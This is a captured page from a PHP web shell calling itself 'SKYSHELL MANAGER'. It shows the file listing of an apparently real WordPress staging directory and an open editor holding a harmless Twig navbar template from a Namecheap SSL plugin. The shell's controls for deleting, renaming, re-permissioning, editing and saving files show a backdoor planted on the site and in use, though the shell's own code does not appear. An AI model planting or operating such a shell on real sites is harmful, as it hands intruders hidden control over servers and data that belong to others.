📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: navbar.html.twig
<nav class="nav-panel"> {% if app.current_route is same as('list.ready') or app.current_route is same as('list.installed') %} <ul class="nav nav-tabs"> <li class="nav-item"> <a class="nav-link {{ app.current_route is same as('list.ready') ? 'active' : '' }}" aria-current="page" href="{{ generateUrlByRouteName('list.ready') }}">Ready for installation</a> </li> <li class="nav-item"> <a class="nav-link {{ app.current_route is same as('list.installed') ? 'active' : '' }}" href="{{ generateUrlByRouteName('list.installed') }}">Installed via "Namecheap SSL"</a> </li> </ul> {% else %} <a href="{{ page.backLink }}" class="btn btn-link btn-sm text-decoration-none ps-0"><span class="glyphicon glyphicon-chevron-left"></span>{{ page.backLinkTxt }}</a> {% endif %} <div class="page-head__nav"> {% if freeCertificatesInfo.count is defined and freeCertificatesInfo.limit is defined %} <span class="page-head__nav__span"> <img src="static/img/lock-fill.svg?{{ rpmVersion }}" alt="lock-fill" class="page-head__nav__link__icon-img"> Free SSL: {{ freeCertificatesInfo.count }}/{{ freeCertificatesInfo.limit }} </span> {% endif %} <a href="{{ supportLink }}" target="_blank" class="page-head__nav__link"> <img src="static/img/life-buoy-gray.svg?{{ rpmVersion }}" alt="life-buoy-gray" class="page-head__nav__link__icon-img"> Support </a> <a href="{{ generateUrlByRouteName('oauth_reconnect') }}" class="page-head__nav__link"> <img src="static/img/arrow-left-right.svg?{{ rpmVersion }}" alt="arrow-left-right" class="page-head__nav__link__icon-img--arrow"> Reconnect "{{ app.user.ncLogin }}"</a> <a href="{{ generateUrlByRouteName('oauth_logout') }}" class="page-head__nav__link"> <img src="static/img/box-arrow-in-right.svg?{{ rpmVersion }}" alt="box-arrow-in-right" class="page-head__nav__link__icon-img--arrow"> Log out of "{{ app.user.ncLogin }}"</a> </div> </nav>
Save